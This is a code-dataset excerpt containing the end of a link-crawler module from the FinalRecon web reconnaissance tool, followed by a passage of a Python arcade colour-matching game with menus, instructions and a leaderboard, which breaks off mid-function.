verify=False, timeout=10)\n\t\tr_sc = r_rqst.status_code\n\t\tif r_sc == 200:\n\t\t\tprint(G + '['.rjust(9, '.') + ' Found ]' + W)\n\t\t\tprint(f'{G}[+] {C}Extracting robots Links{W}', end='', flush=True)\n\t\t\tr_page = r_rqst.text\n\t\t\tr_scrape = r_page.split('\\n')\n\t\t\tfor entry in r_scrape:\n\t\t\t\tif any([\n\t\t\t\t\tentry.find('Disallow') == 0,\n\t\t\t\t\tentry.find('Allow') == 0,\n\t\t\t\t\tentry.find('Sitemap') == 0]):\n\n\t\t\t\t\turl = entry.split(': ')\n\t\t\t\t\ttry:\n\t\t\t\t\t\turl = url[1]\n\t\t\t\t\t\turl = url.strip()\n\t\t\t\t\t\ttmp_url = url_filter(base_url, url)\n\t\t\t\t\t\tif tmp_url is not None:\n\t\t\t\t\t\t\tr_total.append(url_filter(base_url, url))\n\t\t\t\t\t\tif url.endswith('xml') is True:\n\t\t\t\t\t\t\tsm_total.append(url)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\n\t\t\tr_total = set(r_total)\n\t\t\tprint(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))\n\t\t\texporter(data, output, r_total, 'robots')\n\t\telif r_sc == 404:\n\t\t\tprint(R + '['.rjust(9, '.') + ' Not Found ]' + W)\n\t\telse:\n\t\t\tprint(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)\n\texcept Exception as e:\n\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\nasync def sitemap(sm_url, data, output):\n\tglobal sm_total\n\tprint(f'{G}[+] {C}Looking for sitemap.xml{W}', end='', flush=True)\n\ttry:\n\t\tsm_rqst = requests.get(sm_url, headers=user_agent, verify=False, timeout=10)\n\t\tsm_sc = sm_rqst.status_code\n\t\tif sm_sc == 200:\n\t\t\tprint(G + '['.rjust(8, '.') + ' Found ]' + W)\n\t\t\tprint(f'{G}[+] {C}Extracting sitemap Links{W}', end='', flush=True)\n\t\t\tsm_page = sm_rqst.content\n\t\t\tsm_soup = bs4.BeautifulSoup(sm_page, 'xml')\n\t\t\tlinks = sm_soup.find_all('loc')\n\t\t\tfor url in links:\n\t\t\t\turl = url.get_text()\n\t\t\t\tif url is not None:\n\t\t\t\t\tsm_total.append(url)\n\n\t\t\tsm_total = set(sm_total)\n\t\t\tprint(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))\n\t\t\texporter(data, output, sm_total, 'sitemap')\n\t\telif sm_sc == 404:\n\t\t\tprint(R + '['.rjust(8, '.') + ' Not Found ]' + W)\n\t\telse:\n\t\t\tprint(f'{R}{\"[\".rjust(8, \".\")} Status Code : {sm_sc} ]{W}')\n\texcept Exception as e:\n\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\nasync def css(target, data, output):\n\tglobal css_total\n\tprint(f'{G}[+] {C}Extracting CSS Links{W}', end='', flush=True)\n\tcss = soup.find_all('link', href=True)\n\n\tfor link in css:\n\t\turl = link.get('href')\n\t\tif url is not None and '.css' in url:\n\t\t\tcss_total.append(url_filter(target, url))\n\n\tcss_total = set(css_total)\n\tprint(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)\n\texporter(data, output, css_total, 'css')\n\n\nasync def js(target, data, output):\n\tglobal total, js_total\n\tprint(f'{G}[+] {C}Extracting Javascript Links{W}', end='', flush=True)\n\tscr_tags = soup.find_all('script', src=True)\n\n\tfor link in scr_tags:\n\t\turl = link.get('src')\n\t\tif url is not None and '.js' in url:\n\t\t\ttmp_url = url_filter(target, url)\n\t\t\tif tmp_url is not None:\n\t\t\t\tjs_total.append(tmp_url)\n\n\tjs_total = set(js_total)\n\tprint(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))\n\texporter(data, output, js_total, 'javascripts')\n\n\nasync def internal_links(target, data, output):\n\tglobal total, int_total\n\tprint(f'{G}[+] {C}Extracting Internal Links{W}', end='', flush=True)\n\n\text = tldextract.extract(target)\n\tdomain = ext.registered_domain\n\n\tlinks = soup.find_all('a')\n\tfor link in links:\n\t\turl = link.get('href')\n\t\tif url is not None:\n\t\t\tif domain in url:\n\t\t\t\tint_total.append(url)\n\n\tint_total = set(int_total)\n\tprint(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))\n\texporter(data, output, int_total, 'internal_urls')\n\n\nasync def external_links(target, data, output):\n\tglobal total, ext_total\n\tprint(f'{G}[+] {C}Extracting External Links{W}', end='', flush=True)\n\n\text = tldextract.extract(target)\n\tdomain = ext.registered_domain\n\n\tlinks = soup.find_all('a')\n\tfor link in links:\n\t\turl = link.get('href')\n\t\tif url is not None:\n\t\t\tif domain not in url and 'http' in url:\n\t\t\t\text_total.append(url)\n\n\text_total = set(ext_total)\n\tprint(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))\n\texporter(data, output, ext_total, 'external_urls')\n\n\nasync def images(target, data, output):\n\tglobal total, img_total\n\tprint(f'{G}[+] {C}Extracting Images{W}', end='', flush=True)\n\timage_tags = soup.find_all('img')\n\n\tfor link in image_tags:\n\t\turl = link.get('src')\n\t\tif url is not None and len(url) > 1:\n\t\t\timg_total.append(url_filter(target, url))\n\n\timg_total = set(img_total)\n\tprint(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))\n\texporter(data, output, img_total, 'images')\n\n\nasync def sm_crawl(data, output):\n\tglobal sm_crawl_total\n\tprint(f'{G}[+] {C}Crawling Sitemaps{W}', end='', flush=True)\n\n\tthreads = []\n\n\tdef fetch(site_url):\n\t\ttry:\n\t\t\tsm_rqst = requests.get(site_url, headers=user_agent, verify=False, timeout=10)\n\t\t\tsm_sc = sm_rqst.status_code\n\t\t\tif sm_sc == 200:\n\t\t\t\tsm_data = sm_rqst.content.decode()\n\t\t\t\tsm_soup = bs4.BeautifulSoup(sm_data, 'xml')\n\t\t\t\tlinks = sm_soup.find_all('loc')\n\t\t\t\tfor url in links:\n\t\t\t\t\turl = url.get_text()\n\t\t\t\t\tif url is not None:\n\t\t\t\t\t\tsm_crawl_total.append(url)\n\t\t\telif sm_sc == 404:\n\t\t\t\t# print(R + '['.rjust(8, '.') + ' Not Found ]' + W)\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)\n\t\t\t\tpass\n\t\texcept Exception:\n\t\t\t# print(f'\\n{R}[-] Exception : {C}{e}{W}')\n\t\t\tpass\n\n\tfor site_url in sm_total:\n\t\tif site_url != sm_url:\n\t\t\tif site_url.endswith('xml') is True:\n\t\t\t\tt = threading.Thread(target=fetch, args=[site_url])\n\t\t\t\tt.daemon = True\n\t\t\t\tthreads.append(t)\n\t\t\t\tt.start()\n\n\tfor thread in threads:\n\t\tthread.join()\n\n\tsm_crawl_total = set(sm_crawl_total)\n\tprint(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))\n\texporter(data, output, sm_crawl_total, 'urls_inside_sitemap')\n\n\nasync def js_crawl(data, output):\n\tglobal js_crawl_total\n\tprint(f'{G}[+] {C}Crawling Javascripts{W}', end='', flush=True)\n\n\tthreads = []\n\n\tdef fetch(js_url):\n\t\ttry:\n\t\t\tjs_rqst = requests.get(js_url, headers=user_agent, verify=False, timeout=10)\n\t\t\tjs_sc = js_rqst.status_code\n\t\t\tif js_sc == 200:\n\t\t\t\tjs_data = js_rqst.content.decode()\n\t\t\t\tjs_data = js_data.split(';')\n\t\t\t\tfor line in js_data:\n\t\t\t\t\tif any(['http://' in line, 'https://' in line]):\n\t\t\t\t\t\tfound = re.findall(r'\\\"(http[s]?://.*?)\\\"', line)\n\t\t\t\t\t\tfor item in found:\n\t\t\t\t\t\t\tif len(item) > 8:\n\t\t\t\t\t\t\t\tjs_crawl_total.append(item)\n\t\texcept Exception as e:\n\t\t\tprint(f'\\n{R}[-] Exception : {C}{e}{W}')\n\n\tfor js_url in js_total:\n\t\tt = threading.Thread(target=fetch, args=[js_url])\n\t\tt.daemon = True\n\t\tthreads.append(t)\n\t\tt.start()\n\n\tfor thread in threads:\n\t\tthread.join()\n\n\tjs_crawl_total = set(js_crawl_total)\n\tprint(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))\n\texporter(data, output, js_crawl_total, 'urls_inside_js')\n\n\ndef exporter(data, output, list_name, file_name):\n\tdata[f'module-crawler-{file_name}'] = ({'links': list(list_name)})\n\tdata[f'module-crawler-{file_name}'].update({'exported': False})\n\tfname = f'{output[\"directory\"]}/{file_name}.{output[\"format\"]}'\n\toutput['file'] = fname\n\texport(output, data)\n\n\ndef stats(output, data):\n\tglobal total\n\n\ttotal.extend(r_total)\n\ttotal.extend(sm_total)\n\ttotal.extend(css_total)\n\ttotal.extend(js_total)\n\ttotal.extend(js_crawl_total)\n\ttotal.extend(sm_crawl_total)\n\ttotal.extend(int_total)\n\ttotal.extend(ext_total)\n\ttotal.extend(img_total)\n\ttotal = set(total)\n\n\tprint(f'\\n{G}[+] {C}Total Unique Links Extracted : {W}{len(total)}')\n\n\tif output != 'None':\n\t\tif len(total) != 0:\n\t\t\tdata['module-crawler-stats'] = {'Total Unique Links Extracted': str(len(total))}\n\t\t\ttry:\n\t\t\t\ttarget_title = soup.title.string\n\t\t\texcept AttributeError:\n\t\t\t\ttarget_title = 'None'\n\t\t\tdata['module-crawler-stats'].update({'Title ': str(target_title)})\n\n\t\t\tdata['module-crawler-stats'].update(\n\t\t\t\t{\n\t\t\t\t\t'total_urls_robots': len(r_total),\n\t\t\t\t\t'total_urls_sitemap': len(sm_total),\n\t\t\t\t\t'total_urls_css': len(css_total),\n\t\t\t\t\t'total_urls_js': len(js_total),\n\t\t\t\t\t'total_urls_in_js': len(js_crawl_total),\n\t\t\t\t\t'total_urls_in_sitemaps': len(sm_crawl_total),\n\t\t\t\t\t'total_urls_internal': len(int_total),\n\t\t\t\t\t'total_urls_external': len(ext_total),\n\t\t\t\t\t'total_urls_images': len(img_total),\n\t\t\t\t\t'total_urls': len(total)\n\t\t\t\t})\n\t\t\tdata['module-crawler-stats'].update({'exported': False})\n","repo_name":"thewhiteh4t/FinalRecon","sub_path":"modules/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":11025,"program_lang":"python","lang":"en","doc_type":"code","stars":1942,"dataset":"github-code","pt":"72"} +{"seq_id":"37503702234","text":"import arcade\nimport settings\nimport random\nfrom typing import List\n\ntotal_points = str(0)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_TITLE = \"MATCH OFF\"\n\n# game states\nCUT_SCREEN = 0\nMENU = 1\nINSTRUCTIONS = 2\nGAME_RUNNING = 3\nLEADERBOARD = 4\n\n\ndef calc_points(shapes: int) -> int:\n '''takes cleared shapes and calculates the point value\n Args:\n shapes = amount of shapes cleared\n Returns:\n point score\n '''\n if shapes == 1:\n return 10\n\n return 10 + calc_points(shapes - 1)\n\n\nclass Slide:\n '''creates slides\n Attributes:\n slide_name(str) = name of the slide\n '''\n\n def __init__(self, slide_name: str):\n '''creates a sldie object\n Args:\n slide_name: name of slide\n '''\n self._slide_name = slide_name\n\n def get_slide_name(self):\n '''gets the name of the slide\n Returns:\n Name of the slide\n '''\n return self._slide_name\n\n def set_slide_name(self, value: List[str]):\n '''sets a new name for the slide\n '''\n self._slide_name = value\n\n @classmethod\n def create_title(cls, title: str):\n '''creates a title for a slide\n Args:\n title: desired text for the title\n Returns:\n Title on a slide\n '''\n return arcade.draw_text(title, settings.WIDTH / 2, 540,\n arcade.color.BLACK, 30, font_name='GARA',\n anchor_x=\"center\")\n\n\nclass Leaderboard(Slide):\n '''creates a leaderboard\n Attributes:\n scores(list): list of pre-loaded scores\n '''\n\n def __init__(self):\n '''create a leaderboard object\n Args:\n scores: a list of pre-set scores\n '''\n self._scores = [[\"Lauren\", 600], [\"Stevo\", 550],\n [\"Charlotte\", 500], [\"Vince\", 450],\n [\"You!\", int(total_points)]]\n\n def get_scores(self):\n '''gets the list of scores\n Returns:\n List of scores\n '''\n return self._scores\n\n def set_scores(self, value: List):\n '''sets a new list of scores\n '''\n self._scores = value\n\n def sort_scores(self):\n '''bubble sorts the list of scores by score value\n '''\n is_sorted = False\n times_through = 0\n\n while not is_sorted:\n is_sorted = True\n for i in range(len(self._scores) - 1 - times_through):\n a = self._scores[i][1]\n b = self._scores[i + 1][1]\n c = self._scores[i]\n d = self._scores[i + 1]\n if a < b:\n self._scores[i] = d\n self._scores[i + 1] = c\n is_sorted = False\n times_through += 1\n\n @classmethod\n def create_divider(cls, y_coord: int):\n '''creates a horizontal divider for the leaderboard\n Args:\n y_coord: y location of the horizontal line\n Returns:\n Divider on leaderboard\n '''\n return arcade.draw_line(0, y_coord, settings.WIDTH,\n y_coord, arcade.color.BLACK)\n\n\nclass SarahGameView(arcade.View):\n def __init__(self):\n super().__init__()\n self.current_state = CUT_SCREEN\n\n def draw_cut_scene(self):\n # story\n output = \"After finishing that tedious sudoku, you get up\"\n arcade.draw_text(output, settings.WIDTH / 2, 500, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"to grab a cup of coffee. As you rise, you accidentally\"\n arcade.draw_text(output, settings.WIDTH / 2, 450, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"knock over your marbles :0 Quick! You have to pick them\"\n arcade.draw_text(output, settings.WIDTH / 2, 400, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"up before they all roll away!\"\n arcade.draw_text(output, settings.WIDTH / 2, 350, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"Press Space to Continue\"\n arcade.draw_text(output, settings.WIDTH / 2, 150, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n def draw_menu(self):\n # draw shapes\n arcade.draw_rectangle_filled(x, 400, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 134, 100, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 297, 125, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 469, 200, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 165, 135, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 333, 150, 50, 50,\n arcade.color.AO)\n arcade.draw_rectangle_filled(x, 570, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 526, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 560, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 530, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 550, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 574, 50, 50,\n arcade.color.AO)\n arcade.draw_rectangle_filled(x, 250, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 210, 206, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 450, 310, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 360, 400, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 180, 270, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 340, 304, 50, 50,\n arcade.color.AO)\n\n arcade.draw_text(SCREEN_TITLE, settings.WIDTH / 2, 400,\n arcade.color.BLACK, 60, font_name='GARA',\n anchor_x=\"center\")\n\n output = \"Press Space to Continue\"\n arcade.draw_text(output, settings.WIDTH / 2, 250, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n def draw_instructions(self):\n Slide.create_title(\"MATCH OFF INSTRUCTIONS\")\n\n # text for game instructions\n output = \"The objective of the game is to match the colours in\"\n arcade.draw_text(output, settings.WIDTH / 2, 500, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"sets of 3, each matched shape is worth 10 points.\"\n arcade.draw_text(output, settings.WIDTH / 2, 475, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"There are 60 seconds to attempt to attain the highest score.\"\n arcade.draw_text(output, settings.WIDTH / 2, 440, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"Use the mouse to click on the desired colour.\"\n arcade.draw_text(output, settings.WIDTH / 2, 390, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \" Clicking on a colour that does not match the previous\"\n arcade.draw_text(output, settings.WIDTH / 2, 340, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"colour will cancel the selection.\"\n arcade.draw_text(output, settings.WIDTH / 2, 315, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"A high score could snag a spot on the leaderboard!\"\n arcade.draw_text(output, settings.WIDTH / 2, 280, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"If you would like to leave the game at any time, press enter.\"\n arcade.draw_text(output, settings.WIDTH / 2, 230, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"Press Space to Start the Game!\"\n arcade.draw_text(output, settings.WIDTH / 2, 50, arcade.color.BLACK,\n 18, font_name='GARA', anchor_x=\"center\")\n\n # draws floating shapes\n arcade.draw_rectangle_filled(x, 200, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 100, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 125, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 175, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 135, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 150, 50, 50,\n arcade.color.AO)\n\n def draw_game(self):\n for i in self.gsqsprites:\n i.draw()\n\n for i in self.ysqsprites:\n i.draw()\n\n for i in self.rcirsprites:\n i.draw()\n\n for i in self.bcirsprites:\n i.draw()\n\n time = f\"Time: {str(int((round(self.timer))))}\"\n arcade.draw_text(time, settings.WIDTH / 2, settings.HEIGHT / 8,\n arcade.color.BLACK, font_size=18, font_name='GARA',\n anchor_x=\"center\")\n\n arcade.draw_text(total_points, settings.WIDTH / 2,\n settings.HEIGHT / 16, arcade.color.BLACK,\n font_size=30, font_name='GARA', anchor_x=\"center\")\n\n def draw_leaderboard(self):\n # draw floating shapes\n arcade.draw_rectangle_filled(x, 570, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 526, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 560, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 530, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 550, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 574, 50, 50,\n arcade.color.AO)\n\n # draws lines on leaderboard\n Leaderboard.create_divider(settings.HEIGHT / 6)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 2)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 3)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 4)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 5)\n\n # creates and orders scores on leaderboard\n ranks = Leaderboard()\n ranks.sort_scores()\n\n o = f\"1. {ranks._scores[0][0]} --------------- {ranks._scores[0][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 5 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"2. {ranks._scores[1][0]} --------------- {ranks._scores[1][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 4 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"3. {ranks._scores[2][0]} --------------- {ranks._scores[2][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 3 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"4. {ranks._scores[3][0]} --------------- {ranks._scores[3][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 2 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n arcade.draw_text(\"Press Enter to continue\", settings.WIDTH / 2, 30,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\",\n font_name='GARA')\n\n Leaderboard.create_title(\"LEADERBOARD\")\n\n def on_show(self):\n arcade.set_background_color(arcade.color.WHITE_SMOKE)\n global x\n x = 0\n\n self.counter = 35\n self.prevsel = -1 # indicates which colour was last selected\n self.timer = 60\n\n self.gsqsprites = []\n self.ysqsprites = []\n self.rcirsprites = []\n self.bcirsprites = []\n\n self.gsqselected = []\n self.ysqselected = []\n self.rcirselected = []\n self.bcirselected = []\n\n # randomly draws all sprites\n for i in range(self.counter):\n speedgsq = random.uniform(0.01, 1)\n speedysq = random.uniform(-1, -0.01)\n speedrcir = random.uniform(-1, -0.01)\n speedbcir = random.uniform(0.01, 1)\n gsq_posy = random.randrange(0, SCREEN_HEIGHT)\n ysq_posy = random.randrange(0, SCREEN_HEIGHT)\n rcir_posy = random.randrange(0, SCREEN_HEIGHT)\n bcir_posy = random.randrange(0, SCREEN_HEIGHT)\n gsq_posx = random.randrange(-1750, SCREEN_WIDTH)\n ysq_posx = random.randrange(SCREEN_WIDTH, 1750)\n rcir_posx = random.randrange(SCREEN_WIDTH, 1750)\n bcir_posx = random.randrange(-1750, SCREEN_WIDTH)\n\n # define greensquare\n self.gsq = arcade.Sprite(center_x=gsq_posx, center_y=gsq_posy)\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO,\n outer_alpha=200)\n self.gsq.texture = texture\n self.gsq.change_x = speedgsq\n\n self.gsqsprites.append(self.gsq)\n self.gsqselected.append(False) # False means not selected\n\n # define yellowsquare\n self.ysq = arcade.Sprite(center_x=ysq_posx, center_y=ysq_posy)\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD,\n outer_alpha=200)\n self.ysq.texture = texture\n self.ysq.change_x = speedysq\n\n self.ysqsprites.append(self.ysq)\n self.ysqselected.append(False) # False means not selected\n\n # define redcircle\n self.rcir = arcade.Sprite(center_x=rcir_posx, center_y=rcir_posy)\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.RED,\n outer_alpha=200)\n self.rcir.texture = texture\n self.rcir.change_x = speedrcir\n\n self.rcirsprites.append(self.rcir)\n self.rcirselected.append(False) # False means not selected\n\n # define bluecircle\n self.bcir = arcade.Sprite(center_x=bcir_posx, center_y=bcir_posy)\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL,\n outer_alpha=200)\n self.bcir.texture = texture\n self.bcir.change_x = speedbcir\n\n self.bcirsprites.append(self.bcir)\n self.bcirselected.append(False) # False means not selected\n\n def on_draw(self):\n arcade.start_render()\n\n if self.current_state == CUT_SCREEN:\n self.draw_cut_scene()\n elif self.current_state == MENU:\n self.draw_menu()\n elif self.current_state == INSTRUCTIONS:\n self.draw_instructions()\n self.timer = 60\n elif self.current_state == GAME_RUNNING:\n self.draw_game()\n else:\n self.draw_leaderboard()\n\n def on_key_press(self, key, modifiers):\n # changes slides\n if key == arcade.key.SPACE:\n if self.current_state == CUT_SCREEN:\n self.current_state = MENU\n elif self.current_state == MENU:\n self.current_state = INSTRUCTIONS\n elif self.current_state == INSTRUCTIONS:\n self.current_state = GAME_RUNNING\n\n # skips the entire game\n if key == arcade.key.ENTER:\n self.director.next_view()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n global total_points\n\n self.select = [self.gsqselected,\n self.ysqselected,\n self.rcirselected,\n self.bcirselected]\n\n self.sprite = [self.gsqsprites,\n self.ysqsprites,\n self.rcirsprites,\n self.bcirsprites]\n\n self.color = [arcade.make_soft_square_texture(50,\n arcade.color.AO, outer_alpha=200),\n arcade.make_soft_square_texture(50,\n arcade.color.GOLD, outer_alpha=200),\n arcade.make_soft_circle_texture(50,\n arcade.color.RED, outer_alpha=200),\n arcade.make_soft_circle_texture(50,\n arcade.color.COAL, outer_alpha=200)]\n\n self.gsqrid = []\n self.ysqrid = []\n self.rcirrid = []\n self.bcirrid = []\n\n self.gsqclicked = 0\n self.ysqclicked = 0\n self.rcirclicked = 0\n self.bcirclicked = 0\n\n # invalid selection\n for i in range(len(self.gsqsprites)):\n if self.gsqsprites[i].collides_with_point((x, y)):\n if self.prevsel != 0:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 0\n\n for i in range(len(self.ysqsprites)):\n if self.ysqsprites[i].collides_with_point((x, y)):\n if self.prevsel != 1:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 1\n\n for i in range(len(self.rcirsprites)):\n if self.rcirsprites[i].collides_with_point((x, y)):\n if self.prevsel != 2:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 2\n\n for i in range(len(self.bcirsprites)):\n if self.bcirsprites[i].collides_with_point((x, y)):\n if self.prevsel != 3:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 3\n\n for i in range(len(self.gsqsprites)):\n if self.gsqsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.gsqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO)\n self.gsqsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.gsqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO,\n outer_alpha=200)\n self.gsqsprites[i].texture = texture\n\n self.gsqselected[i] = not (self.gsqselected[i])\n\n for i in range(len(self.ysqsprites)):\n if self.ysqsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.ysqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD)\n self.ysqsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.ysqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD,\n outer_alpha=200)\n self.ysqsprites[i].texture = texture\n\n self.ysqselected[i] = not (self.ysqselected[i])\n\n for i in range(len(self.rcirsprites)):\n if self.rcirsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.rcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.RED)\n self.rcirsprites[i].texture = texture\n # character texture is returned to before being tampered with\n elif self.rcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.RED,\n outer_alpha=200)\n self.rcirsprites[i].texture = texture\n\n self.rcirselected[i] = not (self.rcirselected[i])\n\n for i in range(len(self.bcirsprites)):\n if self.bcirsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.bcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL)\n self.bcirsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.bcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL,\n outer_alpha=200)\n self.bcirsprites[i].texture = texture\n\n self.bcirselected[i] = not (self.bcirselected[i])\n\n # removes greensquare triplets\n for i in range(len(self.gsqselected)):\n if self.gsqselected[i]:\n self.gsqclicked += 1\n\n if self.gsqclicked >= 3:\n for i in range(len(self.gsqselected)):\n if self.gsqselected[i]:\n self.gsqrid.append(i)\n total_points = str(int(total_points)+calc_points(self.gsqclicked))\n\n # bubble sort to reverse list\n gsq_sorted = False\n while not gsq_sorted:\n gsq_sorted = True\n for i in range(len(self.gsqrid) - 1):\n b = self.gsqrid[i]\n a = self.gsqrid[i + 1]\n if a > b:\n self.gsqrid[i] = a\n self.gsqrid[i + 1] = b\n gsq_sorted = False\n\n for i in self.gsqrid:\n del self.gsqselected[i]\n del self.gsqsprites[i]\n\n # removes yellowsquare triplets\n for i in range(len(self.ysqselected)):\n if self.ysqselected[i]:\n self.ysqclicked += 1\n\n if self.ysqclicked >= 3:\n for i in range(len(self.ysqselected)):\n if self.ysqselected[i]:\n self.ysqrid.append(i)\n total_points = str(int(total_points)+calc_points(self.ysqclicked))\n\n # bubble sort to reverse list\n ysq_sorted = False\n while not ysq_sorted:\n ysq_sorted = True\n for i in range(len(self.ysqrid) - 1):\n b = self.ysqrid[i]\n a = self.ysqrid[i + 1]\n if a > b:\n self.ysqrid[i] = a\n self.ysqrid[i + 1] = b\n ysq_sorted = False\n\n for i in self.ysqrid:\n del self.ysqselected[i]\n del self.ysqsprites[i]\n\n # removes redcircle triplets\n for i in range(len(self.rcirselected)):\n if self.rcirselected[i]:\n self.rcirclicked += 1\n\n if self.rcirclicked >= 3:\n for i in range(len(self.rcirselected)):\n if self.rcirselected[i]:\n self.rcirrid.append(i)\n total_points = str(int(total_points)+calc_points(self.rcirclicked))\n\n # bubble sort to reverse list\n rcir_sorted = False\n while not rcir_sorted:\n rcir_sorted = True\n for i in range(len(self.rcirrid) - 1):\n b = self.rcirrid[i]\n a = self.rcirrid[i + 1]\n if a > b:\n self.rcirrid[i] = a\n self.rcirrid[i + 1] = b\n rcir_sorted = False\n\n for i in self.rcirrid:\n del self.rcirselected[i]\n del self.rcirsprites[i]\n\n # removes bluecircle triplets\n for i in range(len(self.bcirselected)):\n if self.bcirselected[i]:\n self.bcirclicked += 1\n\n if self.bcirclicked >= 3:\n for i in 